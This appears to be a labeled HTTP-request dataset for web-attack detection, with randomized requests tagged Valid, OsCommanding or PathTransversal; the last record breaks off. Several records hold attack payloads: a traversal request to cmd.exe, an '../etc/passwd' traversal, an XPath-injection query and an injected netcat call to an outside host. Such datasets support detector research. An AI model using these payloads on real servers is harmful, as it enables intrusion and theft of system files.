GET /sock_stream6clogpswget__-4GtmpL@/noesgtGO4rmtu/PEpassthruechoE5UP32o/e1F.3oMxWaWk./smPYjma6RahjWXl6v/dWPk/Py4mh/9fyg0PHhjYnzENqB_@C/vJATz-DI/1hUx.gif?BigtaCnm=03+or+++1%3C+++++s8l0%2Ft%2Fxure1r%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+or+++46811%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&cmdRfC7bbodySL=evgmk7o&fmirttg=85818191&GjQ1CTDaIgs=ieri&S9S0CubF=0&uIkenodcchea=sFR-Aiq&OH.V8OEE=2790549788 HTTP/1.1
Host: 105.83.193.128
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=7265
Client-ip: 201.175.156.200
Cookie: e8veaon=ur;rzn5jeylnnoini=ys29e6h|
Cookie2: $Version="745"
Date: Sun, 02 Nov 08 13:18:22 CET
ETag: "-RjzUPDGi0.zC78Rw@4@"
Expect: rusi4li=en7i
From: petnihea@07eei4h.cz
If-Modified-Since: Mon, 19 Nov 07 23:21:40 UTC
If-Unmodified-Since: Wed, 22 Sep 04 12:46:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 929
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="93es"
Authorization: Digest realm
Range: 81084-3,1907-384053
Referer: http://sofmah.it/aHansk/yuisgt8/drjAyt7t.cfm
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.9 (X11; U; Unix 4.5; ah-k2; rv:9.5.4) Gecko/16107361
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 9192x115
Via: FTP/5.1 www.ereps.js, 5.5 110.65.165.57:0390
Transfer-Encoding: eq82
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5171892279457940
----: -------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49550
Start - Id: 32363
class: Valid
GET /TidmdnoeeortVst/r4fW/olwOsFtaese/.d_update_mOMhK4_c.exe?osdlpb=4371&d8=90&BislOgsswcebns=b980Z_9uU&ihbny=0384265&@XUynullWmJautoexecW=qpacou1qrn8awN6r&saCCvC7j=ijuye&ht5Phlnscece=csfoa3%27O9i HTTP/1.1
Host: www.I4nd0ied.it
Connection: nra0oinr
Accept: video/mpeg, application/*
Accept-Charset: isiri-3342, x-mac-chinesetrad;q=0.7
Accept-Encoding: identity;q=0.0, gzip, identity
Accept-Language: *;q=0.3
Cache-Control: min-fresh=22095
Client-ip: 207.129.23.222
Cookie: 3D=06426945;osiwepo=s8ydwhaw6oqe;anMw=5 nreiboot.ini yse;fma=hVl4wLR.D80w;dylty=836266186
Cookie2: $Version="537"
Date: Sat, 04 Aug 07 13:35:40 CET
ETag: "dO1GC2Ti8NVsqAEapMKP"
Expect: 100-continue
From: nTc4g7an@ldne.de
If-Modified-Since: Wed, 16 Jun 04 04:38:29 GMT
If-Unmodified-Since: Mon, 01 Sep 08 15:59:29 GMT
If-Match: *
If-None-Match: "dEPyO5z.HyN@O4wf3cY"
If-Range: "wglYueljVmSzoEQs6Kq"
Max-Forwards: 8912
MIME-Version: 5.0
Pragma: RgNhoie=taoet955
Proxy-Authorization: Erqi nkto=rllhitln
Authorization: tc3tp ixha=8adas
Range: 90585-,-32
Referer: http://www.aohef2Z0.gov/zIztira/tkhhn/iseSnTEa/oude.msf
TE: gzip,trailers
Trailer: Host
User-Agent: ilJG_p-T http://www.uAp7xe.gov
UA-Disp: 7576,7473,16
UA-OS: Windows 98
UA-Color: color16
Via: 4.5 www.mOoo.shtml, HTTP/6.4 www.sctia.css, neroui/3.5 www.1ni9o.gif
Transfer-Encoding: compress
Upgrade: efetu/5.8, xwp/3.1, aeabu/6.7
Warning: 626 www.8nnanJh1.js "cilEofpcabieeSl0p4hz" 
X-Forwarded-For: 88.70.121.27
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 32363
Start - Id: 11905
class: Valid
GET /rX@0/fgdocszenn5/img87e/tDmZ9Qrz/nBg0k.KrLEPBI6MC.php4?e9nhxeir9fqe6=ehtY&pDorincludek=407153&arar9inridg=ns7&eTwxuWuUft=trlfihlerrclixe&z5TND79l3-eV=n&ye8eEea=ibm+o HTTP/1.1
Host: 93.189.101.124
Connection: close
Accept: audio/basic;q=0.8, video/quicktime, image/gif;q=0.4
Accept-Charset: iso-8859-5;q=0.4, x-mac-japanese, x-mac-japanese;q=0.0
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 141.7.159.107
Cookie: syueuotpsnnuT=+;ZadoxrnNTPel=5293;hela5ibhudtbuue=iat;omuipOlitnnt=liRm;HHgfxtermAa2LIH=OEgbetween6ifnwee6
Cookie2: $Version="1"
Date: Sat, 06 Nov 04 23:46:52 UTC
ETag: "MV3voYN9elZ7vVpCFDz"
Expect: meccetko=pati
From: cwtdea@hotshneub.biz
If-Modified-Since: Fri, 12 Mar 04 17:18:17 GMT
If-Unmodified-Since: Mon, 27 Dec 04 21:25:14 GMT
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: "7q3XaV0xyAbhbT.6"
If-Range: Sun, 11 May 08 21:23:14 UTC
Max-Forwards: 960
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="ehheia"
Authorization: emel oohcn=ey9uap
Range: 2-,67-8,8-83703
Referer: http://Roihfide.fr/h0en/mt2il/deaasI3/Wlstm/sntahae.cfm
TE: trailers,trailers
Trailer: Via
User-Agent: 1kln/1.9.0.1.1
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6ndlex/7.9 183.179.113.71, 2.8 www.pgcrV.jpg, 8.1 www.d2a4.gif
Transfer-Encoding: compress
Upgrade: oail/1.2, webxe/2.0
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11905
Start - Id: 8013
class: Valid
POST /irf/.ZEnV00hHevaljHm/yOPryjL/h_YgoJ-2MaR3g/eQSO3EGDE8Iy98/7Dnq-Rw0D41DXCN63/nr6941slxv8P/t7mWPmHtvh44/mhqpanszL/o7UX.ROg14hUx3YuvKjW.mspx? HTTP/1.1
Content-Length: 183
Content-Language: a
Content-Encoding: identity
Content-Location: /fiE5a0u/Orua.php3
Content-MD5: YndvbXRzdHllbFVFZHQ5TQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Aug 08 13:29:49 UTC
Last-Modified: Wed, 11 Feb 09 23:45:11 CET
Host: www.ss8ctflt.de:76
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, koi8, iso-2022-jp;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 133.145.210.81
Cookie: oknuyThyl=lf.xhW;mfsr5moScntnstD=rEetolds
Cookie2: $Version="60"
Date: Thu, 08 Feb 07 05:17:03 GMT
ETag: W/"iwUUiZ-aaoi9ZPlt"
Expect: 100-continue
From: itepe@sh8wbe.it
If-Modified-Since: Mon, 01 Feb 10 12:51:25 CET
If-Unmodified-Since: Fri, 24 Aug 07 04:28:17 GMT
If-Match: *
If-None-Match: "8Dnn@fuiQMzjJjH"
If-Range: Sun, 06 Sep 09 21:31:20 UTC
Max-Forwards: 6206
MIME-Version: 6.1
Pragma: ttsiiyb=rtlnq
Proxy-Authorization: NTLM dGFUaW9pMDRlbm9vYWt0YWVyc2x0YXNzdnV1ZTZpcnR0
Authorization: Basic YnRtaTM6QTlkaWd6
Range: 439-82,94-,67-
Referer: http://www.saie.org/ob5iyt/o8rREt.jpg
TE: deflate,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.7 (Windows; U; Win98 2.6; ua-gy; rv:6.3.8) Gecko/94843734
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color8
Via: 9.6 134.231.31.70, 6.2 227.206.123.82:80
Transfer-Encoding: compress
Upgrade: ceIre/8.2
Warning: 932 www.eNngulE5.htm:42895 "m0dW" 
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 6980972846
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

fncxoinsoLetWee=5ocay&sflgzsos=4Es&mdgc=aun039Pw-&mon=e+select&6QFD=e82key&VmJvIOo7=/i6ae1oi;ta&ecocopDr=nsjnnlt5eT:oexecpf&tMtarde4eenoc=ar7r&t9hssotcu2t=elocationoht&hyoy=lo

End - Id: 8013
Start - Id: 241
class: Valid
GET /oyhttpcmX@G_ZhgC/vatSPFqS.-XHAxwFM5/i7atgbaelieiteihoe/iyIfuMO7/tqqO8h/eetneeuarrktsex.shtml?b4am=so%5Dn%2Ba9dropeoobject+e9&Nthlttooe=ufemoqci&eH4include.n-zboot.inietcZt=zbsisulwarcyheeiS&eawntDxeahygne=0892&t9qn6dh=%5B+w&neoiweou=resr&EtaaefiO=srg&2sN7g24h5--=aaip&hrdAa=iee%3E2i&lnpePOsa=87096&iuNan6ens=olhfAaaimrh8kl&gts9jutIevaenj=noi HTTP/1.1
Host: www.cuay.net:32901
Connection: close
Accept: text/xml;q=0.2, text/*;q=0.4, application/*;q=0.4
Accept-Charset: euc-kr, iso-2022-kr;q=0.4, cp-932;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 108.88.178.93
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Sat, 04 Oct 08 16:37:43 UTC
ETag: W/"o-gjpjfrrHp3qFe"
Expect: eniti=caaIak;oledjTin
From: yeXhbouc@7trpphie.it
If-Modified-Since: Wed, 30 Aug 06 04:15:22 GMT
If-Unmodified-Since: Wed, 28 Mar 07 20:55:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 May 05 02:06:09 CET
Max-Forwards: 818
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dnNzYXltZDp3aHV4MGJndA==
Authorization: NTLM bnR1b21sM3NhOXJjdGJhRTJ5ZEd3am9pa3JzbHRhYW9lcGU=
Range: 99303-6
Referer: /qiodail/imrnnce.php4
TE: gzip;q=0.2,deflate,chunked
Trailer: Cache-Control
User-Agent: Mozilla/9.5 (Windows; U; Win98 3.6; 1o-So; rv:8.4.6) Gecko/07991729
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 7.7 www.trtshssu.jpeg, HTTP/5.1 www.4nlgilg.html:65055
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 564 18.22.111.11 "soshftojabnnOr7rjean" 
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 25177874898076816291
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 241
Start - Id: 43982
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.mtj7o.uk
Connection: keep-alive
Accept: text/plain;q=0.5, text/xml, application/postscript;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 60.172.21.158
Cookie: lRtftdiaos=l5ldropt;nattts=e/;V9ftpNpassthruBnull=~ p;RnSq1e8e=e3y0e5ai
Cookie2: $Version="84"
Date: Sun, 23 Jul 06 07:49:32 UTC
ETag: "eWaaxQ@0tex2f3f4WX"
Expect: 100-continue
From: diou@el22.cz
If-Modified-Since: Wed, 10 Jun 09 21:13:12 CET
If-Unmodified-Since: Tue, 03 Jun 08 01:28:30 GMT
If-Match: "0HCku5I6FQGDVvH"
If-None-Match: ".oLHX_lw@CIye6gW"
If-Range: "xP75Aa9058Vh6nUsJeL"
Max-Forwards: 37
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Qyeeu qzNllaee=zsachi
Authorization: Digest opaque="rpcs"
Range: -2,795-,-91
Referer: /stbmria/tncshAg/ynrdetmT.jpg
TE: chunked
Trailer: Referer
User-Agent: vlrAVGQ http://www.AjuLrp.com
UA-CPU: x86
UA-Disp: 603,719,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2346x026
Via: FTP/3.1 www.gc620Um.tiff, ejia/9.3 68.147.38.229
Transfer-Encoding: gzip
Upgrade: dsss/1.1, o8rt/7.8, 7ln/9.8
Warning: 278 147.254.183.64 "ie6mtt" "Mon, 03 Apr 06 21:50:29 CET"
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 0238544076735030129
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43982
Start - Id: 36324
class: PathTransversal
GET /hlpt/eahzOq3cw/UeeyOoeq1RtieT/cJX7MAXu2LPf/fNgafwqteaeeoinoe/mMEKkK/eDHOOiZQh9n5@wTP4p/wO2nABQDdyvGg.tiff?iNon7amrtc3oj=57080&@jsE8mC=%3Fd6y&dGmaTudavWoeo=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: www.rlg1nnbwe5.st
Connection: close
Accept: application/*
Accept-Charset: euc-jp;q=0.9, windows-874;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 227.250.97.152
Cookie: GQTDj0=e-MG4A;ub6einq2xnqlhdt=NalertZ;zeDel=o4LQ8_SR;IlueaEeE=tfyvousEvu
Cookie2: $Version="21"
Date: Fri, 10 Aug 07 22:25:42 UTC
ETag: W/"XVnSSkhMGncEq258"
Expect: Ise1ssl
From: 5ygo@eiccrasaq.org
If-Modified-Since: Fri, 27 Feb 09 10:35:11 GMT
If-Unmodified-Since: Mon, 29 Aug 05 07:59:16 GMT
If-Match: "0VFWhMvnXTBb7A6dOh"
If-None-Match: "G4_zTr.Z2pmJyXh"
If-Range: Wed, 18 Jan 06 23:53:39 GMT
Max-Forwards: 31
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dTR1T3RUZWJpb2FwNG9xeHRzNWhlNmxybnNOYjZoNG9zc3V0ZW5zaTJpZU10Y2d0
Range: 94941-674,-88804,1546-98301
Referer: /Trpolo/nacae9/ntt5/fTzaM.mspx
TE: trailers,trailers,gzip;q=0.3
Trailer: User-Agent
User-Agent: efkh3lkW http://www.ctsn.ch
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: no3e6; Deis=JdtodNk
Upgrade: cdl/2.8, oueiab/2.3, nfnoc/8.1
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36324
Start - Id: 8773
class: Valid
GET /.glCyN6ckAffL/r6/itsmw5-zbH/h233exec3httpshu2cfrV/EaIcUI.scriptpa2YY8/lone/cXD/hW/ownkx-/smDn/1j2zNqunzSgnjDj.sh? HTTP/1.1
Host: 14.150.135.23
Connection: close
Accept: text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 151.222.58.186
Cookie: ssnp8wo0i=0/l8;metaFQ-1U=haccess_log>0thh;Dumeyt=entt;Aopsfmtizitr8g=unxdrm
Cookie2: $Version="149"
Date: Tue, 05 Aug 08 10:23:27 UTC
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: ytshor@Dl5ho0zri.ch
If-Modified-Since: Mon, 06 Sep 04 13:47:31 UTC
If-Unmodified-Since: Mon, 01 Jun 09 08:08:27 CET
If-Match: "GiBpV7ySLsRQiIc_"
If-None-Match: "WALySLz07Zixd_jN"
If-Range: "astluQdMNyb3yIPV"
Max-Forwards: 456
MIME-Version: 1.9
Pragma: 1=h0qe
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Digest uri=/tw6uw/sair/zlUepon2.wmn
Range: -914608,-7
Referer: /u1ssmit/x8rel.bin
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/3.3 (Windows; U; Win 9x 3.4; ie-sz; rv:1.8.4) Gecko/13906335
UA-CPU: 68000
UA-Disp: 735,9558,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 633x2304
Via: 5.8 106.78.217.193:1916, 2.1 www.cssis6a.jpeg
Transfer-Encoding: identity
Upgrade: imnd/5.9
Warning: 402 23.131.10.198 "62pynasz" "Thu, 23 Oct 08 04:18:42 UTC"
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8773
Start - Id: 28485
class: Valid
GET /eFFkI/e_f37.uUc1NIGf6smvU/vQxY3w.snuOKZu9r/Rcprocessing-instructionAl6t/otmpflype6HQ/jhrhoegsmn3ncYxtt/eYXHXcH/nS.swf? HTTP/1.1
Host: 182.64.101.173
Connection: hmvltg
Accept: image/gif
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, identity;q=0.0, compress;q=0.6, compress;q=0.0, identity
Accept-Language: q6S-v;q=0.5, Ltiiehiv-7nls, 6a3irh-sl0i1hrl, oo5-rosmdEo, A-twtkz0s;q=0.3
Cache-Control: max-stale
Client-ip: 224.203.86.175
Cookie: soefieeedoo=nqnseyqawcebzaou
Cookie2: $Version="77"
Date: Tue, 17 Jul 07 09:34:02 GMT
ETag: "Wk4KQloP1FWKrsVUXgTm"
Expect: ha9sysae=tolnuDJe;defp=s5loatt0
From: tnt1hws@edhstto.cz
If-Modified-Since: Sat, 23 Jan 10 06:21:11 CET
If-Unmodified-Since: Thu, 29 Apr 10 01:28:35 UTC
If-Match: "PW7wOcfhJY597GtmA"
If-None-Match: *
If-Range: Sun, 18 Dec 05 24:17:18 CET
Max-Forwards: 2
MIME-Version: 1.7
Pragma: ent4d=eh
Proxy-Authorization: et2e taNgj=ss0tnse
Authorization: Basic bm9Sbzo5YWFoSkhqRw==
Range: 5-,-182
Referer: http://www.gedE.gov/jgytc.htm
TE: deflate;q=0.3,trailers,gzip;q=0.8
Trailer: Accept-Encoding
User-Agent: ocIopo (ab527qx3l; oSnNnB3uk; h1_2mRW; kB.N7W)
UA-CPU: x86
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 379x275
Via: FTP/8.0 www.xiibh.js, 5.7 145.126.161.201
Transfer-Encoding: compress
Upgrade: eoMrti/3.9, a3a/8.8, hicis/1.4
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28485
Start - Id: 14610
class: Valid
GET /atY8yfA2xizrJi./ntat87rietlrlpnugoN/y26t/iVhB7.dll?isdharosrki=e&E7=i9+1a%3Au9itoe8e3y&ss2sdmtetD=4479180 HTTP/1.0
Host: 128.220.3.63:00
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.4, x-mac-icelandic;q=0.1, windows-1254, x-mac-chinesetrad
Accept-Encoding: *;q=0.5
Accept-Language: l2t-h, r-f6enao3, 3raa93ni-OsakfYe, ehp-EcEimoe
Cache-Control: no-transform
Client-ip: 148.252.97.18
Cookie: pcrsu=&;esaE=si8oa
Cookie2: $Version="4"
Date: Thu, 01 Jul 04 09:16:21 GMT
ETag: W/"jmDxRyZXA3VL@cVA"
Expect: hmlee=7ryua
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Tue, 08 Jan 08 18:31:05 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:32:06 GMT
If-Match: *
If-None-Match: "YBZSY6xTxVef5Vr"
If-Range: Sun, 05 Nov 06 23:45:33 GMT
Max-Forwards: 7
MIME-Version: 0.8
Pragma: stedmx='6'
Proxy-Authorization: Digest realm
Authorization: NTLM ZEhpZXR6Zm9sbnI2OXUzbnZ0cm5hbW94Z2l1ZWhsZWJoZW8=
Range: 45-4785,-21867,70176-3030
Referer: http://a8eclsor.de/nySae/oxai/8orctqei.msf
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/0.4 (X11; U; Unix 8.0; nu-Ma; rv:9.3.0) Gecko/51274250
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 042x922
Via: 1.4 www.aloiudTg.htm
Transfer-Encoding: u7nr
Upgrade: kreli/7.0
Warning: 443 103.24.228.17 "ectotaen" "Thu, 12 Apr 07 16:19:50 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14610
Start - Id: 22800
class: Valid
GET /2M1sgxi9L14pPV/roLkx0xn3l5tz/rpiigsnsttFnci/6rttehrtp9oei/dt_SwMKG5eDdHTj.asmx?Moj8rienhjuz0=l6OY&ae5lttue=dmedf%28lu&cetne=htrrqhr4l&ekRao=eme HTTP/1.0
Host: www.aqlyanttkd.org:38
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: eztlakeo-er9aa9, wsRm7n-icg;q=0.7, geioeha-9raaeNc;q=0.0, NecsR-hAih0vm;q=0.6, rsashtt-KcUn
Cache-Control: no-store
Client-ip: 95.225.192.240
Cookie: u0phhnrqinsg1en=0lo;lv7rimwph=laioydhNaCuhn
Cookie2: $Version="420"
Date: Sat, 31 Jan 04 17:37:40 UTC
ETag: W/"b_GAB-zN.T7Dt.299aQ-"
Expect: 2eoada=0nu4enkH
From: Ar5ho@jaaeat.fr
If-Modified-Since: Tue, 26 Jun 07 10:55:22 CET
If-Unmodified-Since: Wed, 27 Dec 06 14:32:20 GMT
If-Match: "skR0SzHMr_zg3-rU_bz"
If-None-Match: *
If-Range: Fri, 27 Jun 08 07:45:34 CET
Max-Forwards: 0
MIME-Version: 2.3
Pragma: eei2ida='Gyxry'
Proxy-Authorization: Basic enRydGVlcm86dHRydGc=
Authorization: NTLM cGxybm50bnRjdmg3aWVlb2V0b3RsTG5kc1NybmUwYUxu
Range: -637
Referer: http://www.suaFylte.uk/dueenl/1yhpX7t.tar.gz
TE: deflate,deflate;q=0.1,trailers
Trailer: Transfer-Encoding
User-Agent: bzaoty7obEessl
UA-CPU: 68000
UA-Disp: 335,445,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 396x8159
Via: 6.3 156.33.156.6
Transfer-Encoding: compress
Upgrade: senhmd/7.2, ea02/3.8
Warning: 492 www.aeoc.htm:86338 "reeeoeltlhuso8cRee" 
X-Forwarded-For: 168.118.240.94
X-Serial-Number: 5256236544
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22800
Start - Id: 43373
class: OsCommanding
GET /eVj57uc00h/9P/iOYR0.nv5OsNC1B6hI/nt2nnrdn/o9cf/hCRe-_-Cw_K/nunoaghuls09hIingo/asodoeodCidiisE4/gharaha9ewiCea/y6yb.ZW5HfzBaLGG3B/s0S.swf?ahhInwdwact8rdy=e6jJv6vHHb&eplff0ikc5=spOb6LB&OJS.8_1Heofr=Yd&g2io=oScu3HQWY&aalmnasa=irNaogem&j6mZ=ttrr3riqSsto%25uw&5dCPK=%5Cn&myogrehMn=436&fecitid=90&aduecogaurC=149943780&3asL=+a%25ed&dterefesEao=%250a++++nc+++www.asrengesvema.com++++80%3B&upca94ngth=lnth HTTP/1.1
Host: www.qntaeceGT.gov
Connection: 4GstnjdC
Accept: */*;q=0.2
Accept-Charset: isiri-3342;q=0.3, big5;q=0.1, iso-8859-7, windows-1254, hz-gb-2312
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 255.185.181.53
Cookie: ejt=tIdz7k;tSnetsiHi1o=Rsu5iea;drop-HmNA= nr
Cookie2: $Version="002"
Date: Thu, 14 Oct 04 09:16:18 CET
ETag: "t_0bP8amfnwUL9KrdCI"
Expect: aoukreuC
From: utidoe@qznd.net
If-Modified-Since: Thu, 29 Apr 04 21:49:04 UTC
If-Unmodified-Since: Wed, 11 Jun 08 23:05:48 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Oct 05 03:12:30 CET
Max-Forwards: 571
MIME-Version: 2.7
Pragma: 6i7xh='n9he'
Proxy-Authorization: Digest uri=http://www.aSgm.net/onpfm.pdf
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: http://tiea.be/wt9senah/9heRnstr/thidfaa8/t6ehec/hntJ.cfm
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 3.6; sn-by; rv:6.7.2) Gecko/51494822
UA-CPU: Sparc
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9788x122
Via: Esl/8.6 66.199.162.24:635, 9.0 www.p474vb.tiff:8749, HTTP/2.1 65.47.98.138
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 75.64.37.214
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43373
Start - Id: 29573
class: Valid
GET /frSvbvyuLsimdoT4fad/aa/3CYTksg@Ysf_3OI/u4fUhjn/nenO8tepepv/HC@WT03WJ/mD-uDeggLFo3/hs/ltfiuSe0/wbdtmtkadeaiem.aspx?htzehuarENmt=05492&d5ota=%24gm%24&FSKu3=osHetdiToiaewaY&Gd3cQ7tbetweenPVmeta=Eitmpssa3opst&cEiiSeCsc4subag=sC5%40hM&thtneahduweotn=30&ltEldd4ecndd=%3Cr%40+r&m8scriptFobjectfg-p=oh6iwdEd7gaeeafwca&wehGnrpao=48&yweeee=ikAHZf6Zh HTTP/1.1
Host: www.ir9mwonaNh.be:80
Connection: e8etqe
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=03626
Client-ip: 241.190.126.224
Cookie: uaTaitsqtzq=3srm;uhdnoeEiro4ua=niilley;ileixALa0e=10049
Cookie2: $Version="0"
Date: Fri, 16 May 08 24:10:15 GMT
ETag: "MsiGfy9qc00bkKix8red"
Expect: 100-continue
From: d1em@0njeio.be
If-Modified-Since: Wed, 03 Nov 04 07:38:42 UTC
If-Unmodified-Since: Tue, 20 Feb 07 04:55:44 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 09 Jan 05 02:35:29 GMT
Max-Forwards: 816
MIME-Version: 6.8
Pragma: usoo=e9
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: c1toak Canboa=bESmil
Range: 825369-97,558284-7,646196-4450
Referer: http://ycsEni8L.net/rezeacsA/dtms/urtbeu/ulduoo/uot94h.ace
TE: gzip;q=0.9,trailers,deflate;q=0.7
Trailer: Trailer
User-Agent: Mozilla/3.8 (Windows; U; Win98 4.7; zn-na; rv:7.9.6) Gecko/72647835
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: 9.4 www.hmft.jpg:65472
Transfer-Encoding: identity
Upgrade: gih7ot/7.0, vjwg/9.7, tttnua/4.6
Warning: 880 250.169.70.244:31 "ob2rr7pb4tes" "Sun, 10 May 09 07:32:46 UTC"
X-Forwarded-For: 246.98.194.69
X-Serial-Number: 2765220543108892245
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29573
Start - Id: 11753
class: Valid
GET /nar7dscew/e.dZfzwsas3/iSsu@Z_z2Bkz8g6/qUitee/nr/8rL0rpiltuvrc5canS/ps9h/7BZmiY_v8HE/flrtRdcl3A.swf? HTTP/1.1
Host: www.okblAGt.uk
Connection: uaimn9r
Accept: audio/*, application/postscript, application/rtf;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 177.66.87.60
Cookie: saed96n9ech4U=oimcQHNoUE;thsa=6044065;onaxd=6a.GpVlY3Lp;uslspnPTfsNlds=t.Yk;iw=3217
Cookie2: $Version="961"
Date: Mon, 10 Jul 06 24:34:06 GMT
ETag: W/"9-Y71@vqJOPzOMz"
Expect: 100-continue
From: ccsp3@ElRrgnej.biz
If-Modified-Since: Fri, 23 Mar 07 12:39:23 UTC
If-Unmodified-Since: Sun, 25 Dec 05 19:18:21 CET
If-Match: "G-SPH74y-2f7N3DhjAWJ"
If-None-Match: *
If-Range: Wed, 13 May 09 04:06:16 GMT
Max-Forwards: 0488
MIME-Version: 2.8
Pragma: cpxi='ihr'
